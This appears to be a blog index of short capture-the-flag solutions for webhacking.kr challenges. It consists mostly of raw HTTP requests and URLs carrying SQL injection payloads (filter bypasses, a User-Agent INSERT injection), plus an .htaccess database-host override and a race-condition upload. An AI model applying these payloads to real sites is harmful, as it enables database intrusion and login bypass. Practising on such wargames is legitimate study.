Hacking

(65)
Webhacking.kr 45
GET /challenge/web/web-22/index.php?id=%aa'%09or%09id%3d%090x61646d696e%23&pw=guest HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
HTTPS: 1
Referer: http://webhacking.kr/challen..
Webhacking.kr 30 This challenge is about making the web server load its default settings through an .htaccess file.
php_admin_value mysql.default_host "my IP address"
php_admin_value mysql.default_user "a"
php_admin_value mysql.default_password "a"
Webhacking.kr 37 After the file corresponding to the timestamp is created, if the file uploaded by the user is created and overwrites it http://webhacking.kr/challenge/web/web-18/index.phps
POST /challenge/web/web-18/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Content-Length: 201
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webhacking.kr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_..
Webhacking.kr 61 This challenge is about renaming a column. Because of magic_quotes_gpc, the value is entered as hex: 0x61646d696e 0x61646d696e as id
Webhacking.kr 5 MySQL truncation vulnerability
Webhacking.kr 49 http://webhacking.kr/challenge/web/web-24/index.php?lv=-1%7C%7Cid=0x61646d696e
Webhacking.kr 46 http://webhacking.kr/challenge/web/web-23/index.php?lv=0%0aor%0aid=char(97,100,109,105,110) A method that uses the database's character function
Webhacking.kr 8
GET /challenge/web/web-08/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: cirrus','125.131.189.61','admin')#
HTTPS: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7; oldzombie=1
X-dotNet-Beautifier: 19..